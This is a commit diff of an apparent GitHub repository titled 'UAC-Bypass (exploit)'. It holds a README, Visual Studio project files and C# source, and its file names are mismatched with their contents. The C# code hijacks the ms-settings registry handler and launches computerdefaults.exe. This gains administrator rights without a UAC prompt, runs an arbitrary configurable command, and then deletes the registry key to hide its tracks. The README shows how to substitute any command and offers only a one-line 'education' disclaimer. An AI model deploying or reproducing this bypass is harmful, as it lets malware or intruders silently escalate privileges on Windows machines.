-

Author: K3rnel-Dev

0420.gif

@@ -1,2 +1,25 @@
-# UAC-Bypass
- 𝐄𝐚𝐬𝐲 𝐩𝐫𝐨𝐠𝐫𝐚𝐦 𝐟𝐨𝐫 𝐛𝐲𝐩𝐚𝐬𝐬𝐢𝐧𝐠 𝐔𝐀𝐂-𝐌𝐞𝐬𝐬𝐚𝐠𝐞 ⚠
+# UAC-Bypass (exploit)
+![CSHARP](https://img.shields.io/badge/Language-CSHARP-aqua?style=for-the-badge&logo=CS)
+![](logo.png)
+
+## 📑 About
+<b> 𝐄𝐚𝐬𝐲 𝐩𝐫𝐨𝐠𝐫𝐚𝐦 𝐟𝐨𝐫 𝐛𝐲𝐩𝐚𝐬𝐬𝐢𝐧𝐠 𝐔𝐀𝐂-𝐌𝐞𝐬𝐬𝐚𝐠𝐞 ⚠ </b>
+
+### 💾 Features:
+ * Size: 7kb✅
+
+## 💻 Example
+<p float="left" align="center">
+  <img alt="screen" width="300" src="0420.gif">
+</p> 
+
+## Insturction
+ * Change this line in file Program.cs, and put your command:
+ ```csharp
+5 public const string command = "/k @echo Hello world && regedit"; // your command
+ ```
+ 
+## ⚠️ Disclaimer
+```
+This project for education and purposes only!
+```

README.md

@@ -0,0 +1,31 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 17
+VisualStudioVersion = 17.9.34622.214
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "uac_tester", "uac_tester\uac_tester.csproj", "{7BD20F1A-7BF1-453C-8D03-98E6FEE61A91}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Any CPU = Debug|Any CPU
+		Debug|x86 = Debug|x86
+		Release|Any CPU = Release|Any CPU
+		Release|x86 = Release|x86
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{7BD20F1A-7BF1-453C-8D03-98E6FEE61A91}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+		{7BD20F1A-7BF1-453C-8D03-98E6FEE61A91}.Debug|Any CPU.Build.0 = Debug|Any CPU
+		{7BD20F1A-7BF1-453C-8D03-98E6FEE61A91}.Debug|x86.ActiveCfg = Debug|x86
+		{7BD20F1A-7BF1-453C-8D03-98E6FEE61A91}.Debug|x86.Build.0 = Debug|x86
+		{7BD20F1A-7BF1-453C-8D03-98E6FEE61A91}.Release|Any CPU.ActiveCfg = Release|Any CPU
+		{7BD20F1A-7BF1-453C-8D03-98E6FEE61A91}.Release|Any CPU.Build.0 = Release|Any CPU
+		{7BD20F1A-7BF1-453C-8D03-98E6FEE61A91}.Release|x86.ActiveCfg = Release|x86
+		{7BD20F1A-7BF1-453C-8D03-98E6FEE61A91}.Release|x86.Build.0 = Release|x86
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+	GlobalSection(ExtensibilityGlobals) = postSolution
+		SolutionGuid = {C49D134A-ADAC-4E2F-9125-D9BF6E6E9590}
+	EndGlobalSection
+EndGlobal

logo.png

@@ -0,0 +1,6 @@
+<?xml version="1.0" encoding="utf-8" ?>
+<configuration>
+    <startup> 
+        <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.6" />
+    </startup>
+</configuration>

source/uac_tester.sln

@@ -0,0 +1,70 @@
+using Microsoft.Win32;
+using System.Diagnostics;
+using System.Security.Principal;
+
+namespace UX
+{
+    internal class ClientStandalone
+    {
+        public static void ux()
+        {
+            try
+            {
+                if (!ClientAPI())
+                {
+                    ClientBridge();
+                }
+                else
+                {
+                    Process.Start("cmd.exe", $"/c start \"UxUAC [HEHE-BAY]\" \"cmd.exe\" \"{Program.command}");
+                    RegistryKey ShellParentPath = Registry.CurrentUser.OpenSubKey(@"Software\Classes\ms-settings", true);
+                    ShellParentPath.DeleteSubKeyTree("shell", false);
+                    ShellParentPath.Close();
+                }
+            }
+            catch { }
+        }
+         static void ClientBridge()
+        {
+            if (!ClientAPI())
+            {
+                foreach (var Path in new[] { "Classes", @"Classes\ms-settings", @"Classes\ms-settings\shell", @"Classes\ms-settings\shell\open" })
+                    ClientOpening(Path);
+                
+                try
+                {
+                    var DelegatePath = ClientOpening(@"Classes\ms-settings\shell\open\command");
+                    DelegatePath.SetValue("", Process.GetCurrentProcess().MainModule.FileName, RegistryValueKind.String);
+                    DelegatePath.SetValue("DelegateExecute", 0, RegistryValueKind.DWord);
+                    DelegatePath.Close();
+
+                    Process.Start(new ProcessStartInfo()
+                    {
+                        CreateNoWindow = true,
+                        UseShellExecute = false,
+                        RedirectStandardError = true,
+                        RedirectStandardOutput = true,
+                        FileName = "cmd.exe",
+                        Arguments = "/c @start computerdefaults.exe"
+                    });
+                }
+                catch { };
+            }
+            else
+            {
+                ClientOpening(@"Classes\ms-settings\shell\open\command").SetValue(null, null, RegistryValueKind.String);
+            }
+        }
+
+        static bool ClientAPI()
+        {
+            return new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator);
+        }
+
+        static RegistryKey ClientOpening(string RegPath)
+        {
+            RegistryKey FRegPath = Registry.CurrentUser.OpenSubKey($@"Software\{RegPath}", true);
+            return FRegPath is null ? Registry.CurrentUser.CreateSubKey($@"Software\{RegPath}", true) : FRegPath;
+        }
+    }
+}

source/uac_tester/App.config

@@ -0,0 +1,11 @@
+namespace UX
+{
+    internal class Program
+    {
+        public const string command = "/k @echo Hello world && regedit"; // your command
+        static void Main(string[] args)
+        {
+            ClientStandalone.ux();
+        }
+    }
+}

source/uac_tester/ClientStandalone.cs

@@ -0,0 +1,36 @@
+using System.Reflection;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+
+// Общие сведения об этой сборке предоставляются следующим набором
+// набора атрибутов. Измените значения этих атрибутов для изменения сведений,
+// связанные с этой сборкой.
+[assembly: AssemblyTitle("")]
+[assembly: AssemblyDescription("")]
+[assembly: AssemblyConfiguration("")]
+[assembly: AssemblyCompany("")]
+[assembly: AssemblyProduct("")]
+[assembly: AssemblyCopyright("")]
+[assembly: AssemblyTrademark("")]
+[assembly: AssemblyCulture("")]
+
+// Установка значения False для параметра ComVisible делает типы в этой сборке невидимыми
+// для компонентов COM. Если необходимо обратиться к типу в этой сборке через
+// из модели COM задайте для атрибута ComVisible этого типа значение true.
+[assembly: ComVisible(false)]
+
+// Следующий GUID представляет идентификатор typelib, если этот проект доступен из модели COM
+[assembly: Guid("7bd20f1a-7bf1-453c-8d03-98e6fee61a91")]
+
+// Сведения о версии сборки состоят из указанных ниже четырех значений:
+//
+//      Основной номер версии
+//      Дополнительный номер версии
+//      Номер сборки
+//      Номер редакции
+//
+// Можно задать все значения или принять номера сборки и редакции по умолчанию 
+// используя "*", как показано ниже:
+// [assembly: AssemblyVersion("1.0.*")]
+[assembly: AssemblyVersion("1.0.0.0")]
+[assembly: AssemblyFileVersion("1.0.0.0")]

source/uac_tester/Program.cs

@@ -0,0 +1,68 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
+  <PropertyGroup>
+    <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
+    <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
+    <ProjectGuid>{7BD20F1A-7BF1-453C-8D03-98E6FEE61A91}</ProjectGuid>
+    <OutputType>Exe</OutputType>
+    <RootNamespace>UX</RootNamespace>
+    <AssemblyName>UxUAC</AssemblyName>
+    <TargetFrameworkVersion>v4.6</TargetFrameworkVersion>
+    <FileAlignment>512</FileAlignment>
+    <AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
+    <Deterministic>true</Deterministic>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugSymbols>false</DebugSymbols>
+    <DebugType>none</DebugType>
+    <Optimize>false</Optimize>
+    <OutputPath>bin\Debug\</OutputPath>
+    <DefineConstants>DEBUG;TRACE</DefineConstants>
+    <ErrorReport>none</ErrorReport>
+    <WarningLevel>0</WarningLevel>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugType>none</DebugType>
+    <Optimize>true</Optimize>
+    <OutputPath>bin\Release\</OutputPath>
+    <DefineConstants>TRACE</DefineConstants>
+    <ErrorReport>none</ErrorReport>
+    <WarningLevel>0</WarningLevel>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|x86'">
+    <OutputPath>bin\x86\Debug\</OutputPath>
+    <DefineConstants>DEBUG;TRACE</DefineConstants>
+    <WarningLevel>0</WarningLevel>
+    <PlatformTarget>x86</PlatformTarget>
+    <LangVersion>7.3</LangVersion>
+    <ErrorReport>none</ErrorReport>
+    <Prefer32Bit>true</Prefer32Bit>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Release|x86'">
+    <OutputPath>bin\x86\Release\</OutputPath>
+    <DefineConstants>TRACE</DefineConstants>
+    <Optimize>true</Optimize>
+    <WarningLevel>0</WarningLevel>
+    <PlatformTarget>x86</PlatformTarget>
+    <LangVersion>7.3</LangVersion>
+    <ErrorReport>none</ErrorReport>
+    <Prefer32Bit>true</Prefer32Bit>
+  </PropertyGroup>
+  <ItemGroup>
+    <Reference Include="System" />
+    <Reference Include="Microsoft.CSharp" />
+    <Reference Include="System.Data" />
+  </ItemGroup>
+  <ItemGroup>
+    <Compile Include="Program.cs" />
+    <Compile Include="Properties\AssemblyInfo.cs" />
+    <Compile Include="ClientStandalone.cs" />
+  </ItemGroup>
+  <ItemGroup>
+    <None Include="App.config" />
+  </ItemGroup>
+  <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
+</Project>